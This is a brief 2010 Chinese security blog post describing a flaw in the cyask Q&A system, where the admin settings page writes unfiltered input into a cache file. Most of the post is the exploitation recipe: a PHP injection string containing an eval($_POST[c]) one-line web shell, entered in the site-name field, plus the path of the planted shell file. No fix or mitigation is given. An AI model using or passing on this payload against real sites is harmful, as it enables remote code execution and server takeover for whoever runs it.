【漏洞】cyask 后台拿 WebShell 2010-06-29 老系统内容 Shell Web WebShell 后台 漏洞 约 153 字 预计阅读 1 分钟 文章目录 涉及系统: cyask所有版本 漏洞描述: 写cache的时候没有进行过滤 漏洞位置: include/global.func.php中的create_cache函数 利用方法: 后台参数设置,在网站名称里输入:';?><? eval($_POST[c]);?> 生成的一句话位于:askdata/cache/cache_variable.php 文章作者 Nuclear'Atk 上次更新 2010-06-29 许可协议 Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。